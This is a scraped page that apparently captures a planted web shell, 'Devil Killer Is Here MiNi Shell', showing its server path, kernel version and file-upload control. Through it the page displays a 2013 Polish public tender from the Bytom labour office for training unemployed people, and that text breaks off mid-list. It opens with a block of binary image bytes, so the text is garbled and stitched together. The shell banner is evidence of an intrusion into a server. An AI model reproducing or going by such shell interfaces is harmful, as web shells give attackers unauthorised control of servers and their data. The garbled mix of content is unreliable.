JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130125/35140-N-2013.html

<p class="kh_header"><b>Bytom: Szkolenia osób bezrobotnych, 
w podziale na XX  części  finansowane ze środków Funduszu Pracy</b><br>
<b>Numer ogłoszenia: 35140 - 2013; data zamieszczenia: 25.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Łagiewnicka 15, 41-902 Bytom, woj. śląskie, tel. 032 2813307, 2817019, 2818860, faks 032 2818860.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pupbytom.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna samorządu terytorialnego. Powiatowy Urząd Pracy..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenia osób bezrobotnych, 
w podziale na XX  części  finansowane ze środków Funduszu Pracy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są szkolenia osób bezrobotnych zarejestrowanych                           w Powiatowym Urzędzie Pracy w Bytomiu w podziale na  XX  części.
Szkolenia winny odbywać się na terenie Bytomia lub w innej miejscowości, przy czym łączny czas dojazdu z centrum Bytomia do miejsca odbywania szkolenia i z powrotem środkami transportu zbiorowego nie może przekraczać 3 godzin.
Koszt dojazdu do miejsca odbywania szkolenia i z powrotem pokrywa uczestnik szkolenia. Zajęcia winny odbywać się codziennie, wyłącznie od poniedziałku do piątku, w godzinach przedpołudniowych lub popołudniowych. (zaczynać się nie wcześniej niż o godz. 8:00 kończyć nie później niż   o godzinie 19:00),    w formie kursu , realizowanego według planu nauczania obejmującego przeciętnie nie mniej niż 25 godz. zegarowych w tygodniu.
Zamawiający skieruje osoby bezrobotne, zakwalifikowane na dane szkolenie, na badania lekarskie i psychologiczne określone w programie szkolenia we własnym zakresie i na własny koszt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających do 50% wartości zamówienia podstawowego dla części IV, IX XII, XIV, XV.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.31.00-0, 80.53.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 20.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien posiadać zaktualizowany na 2013 rok wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy dla siedziby Wykonawcy, stosownie do treści art. 20 ust. 1 ustawy z dnia 20.04.2004 r. o promocji zatrudnienia i instytucjach rynku pracy (jt. Dz. U. z 2008 r. Nr 69, poz. 415).
Ponadto:

Dotyczy części XII: wykonawca winien posiadać pisemne potwierdzenie Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego wymagań określonych w Rozporządzeniu Ministra Gospodarki z dnia 20.09.2001 w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U nr 118 poz.1263 z 2001 r.)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien zapewnić uczestnikom szkolenia warunki do nauki z uwzględnieniem zasad BHP oraz wyposażeniem stosownym do potrzeb grupy słuchaczy.

Wykonawca winien wykazać, iż w celu realizacji nin. zamówienia dysponuje lub będzie dysponował lokalem obejmującym co najmniej:
a) salę wykładową min. 2 m2 powierzchni sali wykładowej na jednego kursanta, posiadającą oświetlenie dzienne z możliwością zaciemnienia w postaci
     zasłon, rolet czy żaluzji oraz oświetlenie sztuczne,
b) odpowiednio wyposażone pomieszczenie/a do przeprowadzenia zajęć praktycznych
    zgodnie z tematyką prowadzonego szkolenia,
      c)   WC,
      d)   pomieszczenie umożliwiające przygotowanie ciepłych i zimnych napoi i spożycie posiłku, wyposażone w czajnik, naczynia, sztućce - zwane w skrócie jadalnią 
oraz wskazać podstawę dysponowania powyższym zasobem.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zobowiązany wykazać, iż posiada aktualne, opłacone ubezpieczenie                 od odpowiedzialności cywilnej z tytułu prowadzonej działalności związanej                                z przedmiotem zamówienia, co najmniej na kwotę 10 000,00 zł.W przypadku rozłożenia składki ubezpieczeniowej na raty, Zamawiający uzna spełnienie warunku w przypadku, gdy na dzień składania ofert opłacona została część wymagalnej składki.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Program szkolenia - Załącznik nr 5 do SIWZ</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)OFERTA, która winna być zgodna z formularzem stanowiącym załącznik Nr 1 do specyfikacji;
2) pełnomocnictwo do reprezentowania firmy w postępowaniu, jeżeli nie wynika ono z dokumentów przedłożonych w ofercie; w tym wynikające     z art. 23 ustawy Prawo zamówień publicznych lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert w przypadku gdy ofertę składa osoba fizyczna.
3)	pisemne zobowiązania innych podmiotów do oddania  do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Posiadanie certyfikatu jakości usług - 15</li>
<li>3 - Miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, za   wyjątkiem możliwości i warunków dokonania takiej zmiany określonych poniżej:
a)	zmiana strony umowy tj. następstwo prawne wynikające z odrębnych przepisów,
b)	zmiana terminu wykonania zamówienia będąca następstwem okoliczności, których nie można było wcześniej przewidzieć i nie można jej przypisać Wykonawcy, w tym w przypadku przedłużającej się procedury przetargowej, jeżeli do wykonania zamówienia pozostało mniej niż 2 miesiące od dnia zawarcia umowy
c)	zmiany osób, które będą uczestniczyć w wykonywaniu zamówienia,
d)	zmiany ilości uczestników szkolenia, będącej następstwem okoliczności, których nie można było przewidzieć.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pupbytom.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Bytomiu
ul. Łagiewnicka 15
41-902 Bytom
pok. 62.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2013 godzina 09:00, miejsce: Powiatowy Urząd Pracy w Bytomiu
ul. Łagiewnicka 15
41-902 Bytom
pok. 20 (Biuro Podawcze).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ I

ABC przedsiębiorczości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 150 godz. i następujące przedmioty nauczania:

1.	Podstawy prawne prowadzenia działalności gospodarczej;
2.	Dokumenty i procedury związane z rejestrowaniem działalności gospodarczej;
3.	Funkcjonowanie firmy;
4.	Prowadzenie rozliczeń firmy z ZUS;
5.	Prowadzenie rozliczeń firmy z Urzędem Skarbowym;
6.	Obsługa kasy fiskalnej;
7.	Obsługa urządzeń biurowych;
8.	Operacyjna obsługa komputera;
9.	Podstawowe zasady obsługi programu K-K Symfonia;
10.	Prowadzenie książki przychodów i rozchodów;
11.	Podstawowe przepisy prawa pracy;
12.	Dokumentacja handlowa, osobowa i administracyjna firmy;
13.	Marketing i reklama w firmie;
14.	Tworzenie biznesplanu;
15.	Szef i pracownik - komunikacja interpersonalna - mobbing w pracy.

Zamówienie obejmuje przeszkolenie od 10 do 15 osób, w 3 grupach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ II

Blacharz - dekarz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 200. Szkolenie musi zawierać następujące przedmioty nauczania:

1.	Zasady BHP i ppoż. przy robotach dekarskich;
2.	Pierwsza pomoc przedlekarska;
3.	Podstawy budownictwa ogólnego;
4.	Dokumentacja techniczna;
5.	Narzędzia i sprzęt do robót dekarskich;
6.	Podkłady pod pokrycia papowe;
7.	Materiały bitumiczne;
8.	Układanie pokryć z papy;
9.	Podkłady i materiały do krycia dachówką;
10.	Układanie pokryć z dachówek;
11.	Krycie dachów płaskich;
12.	Obróbki blacharskie;
13.	Systemy rynnowe, techniki montowania.

Zamówienie obejmuje przeszkolenie od 4 do 5 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ III

Brukarz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 150. Szkolenie musi zawierać następujące przedmioty nauczania:

1.	Przepisy BHP i ppoż w robotach brukarskich;
2.	Pierwsza pomoc przedlekarska;
3.	Podstawowe wiadomości o robotach drogowych;
4.	Podstawy zasadniczych technologii robót brukarskich;
5.	Ogólne warunki techniczne wykonywania robót brukarskich;
6.	Rysunek zawodowy;
7.	Przygotowanie do wykonania i remontów nawierzchni chodników, ulic, placów                        z kamieni i kostek oraz płyt;
8.	Wykonywanie podbudowy z gruntu stabilizowanego cementem;
9.	Wykonywanie podbudowy z chudego betonu;
10.	Przygotowanie do brukowania powierzchni skarp, stożków i węzłów tramwajowych;
11.	Przygotowanie do pracy urządzeń i podstawowego sprzętu;
12.	Obsługa i konserwacja urządzeń i podstawowego sprzętu.

Zamówienie obejmuje przeszkolenie od 6 do 8 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CZĘŚĆ IV

Florysta - designer. Samodzielny kreator dekoracji kwiatowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 300 i następujące przedmioty nauczania:

1.	Podstawowe wiadomości z anatomii, fizjologii i biologii oraz produkcji roślin ozdobnych;
2.	Podział i przegląd roślin ozdobnych;
3.	Artykuły stosowne do aranżacji roślin ozdobnych;
4.	Tworzenie układów kompozycyjnych z roślin żywych i utrwalonych;
5.	Florystyka okolicznościowa / stroiki na Boże Narodzenie i dekoracje wielkanocne/, ślubna /wiązanka biedermajerowska, spływająca, fantazyjna/, komunijnych /wianek, zdobienie świecy i wiązanka komunijna/ i żałobna /wieniec obręczowy, poduszkowy, rzymski, dekoracje w kształcie krzyża i serca/;
6.	Dekorowanie florystyczne wnętrz /sal, kościołów/ i imprez plenerowych;
7.	Artystyczne pakowanie  prezentów;
8.	Elementy decoupage;
9.	Elementy dekoracji szkła; 
10.	Ogólne zasady projektowania małych ogrodów, klombów sezonowych, mis i skrzynek kwiatowych;
11.	Obsługa kasy fiskalnej;
12.	Organizacja i techniki sprzedaży materiału roślinnego;
13.	Urządzenie i organizacja miejsca sprzedaży;
14.	BHP;
15.	Pierwsza pomoc przedlekarska.

Zamówienie obejmować będzie łącznie od 18 do 20 osób, w dwóch grupach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> CZĘŚĆ V 

Grafika komputerowa i tworzenie stron WWW..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 300 godz. i następujące przedmioty nauczania:
1.	Wstęp do grafiki komputerowej;
2.	Grafika prezentacyjna - MS Power Point;
3.	Program do obróbki grafiki wektorowej Corel Draw/Adobe Ilustrator;
4.	Program do obróbki grafiki bitnapowej Adobe PhotoShop, Gimp, Corel PhotoPaint;
5.	Program Flash;
6.	Grafika DTP - Adobe InDesigne;
7.	Strony WWW;
8.	HTML;
9.	Serwery WWW.

Zamówienie obejmuje łącznie od 18 do 20 osób, dwie grupy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.31.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> CZĘŚĆ VI 

Grooming.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 100. Szkolenie musi zawierać następujące przedmioty nauczania:

1.	Podstawy wiedzy z zakresu pielęgnacji psów, technik strzyżenia i trymowania poszczególnych ras zgodnie z wymogami wystawowymi (strzyżenie wg wzorów FCI i aktualnych trendów);
2.	Zabiegi pielęgnacyjne, m. in. kąpanie i suszenie psów;
3.	Zabiegi dodatkowe takie jak: czyszczenie uszu, zębów, obcinanie pazurów, czesanie i rozczesywanie włosów;
4.	Podstawy zwierzęcej psychologii, techniki obłaskiwania psów, redukowania stresu u zwierząt. Nauka właściwego podejścia do zwierząt;
5.	Informacje o kosmetykach dla zwierząt (szampony, odżywki, pudry, farby itp.);
6.	Rodzaje sierści i narzędzia do ich pielęgnacji;
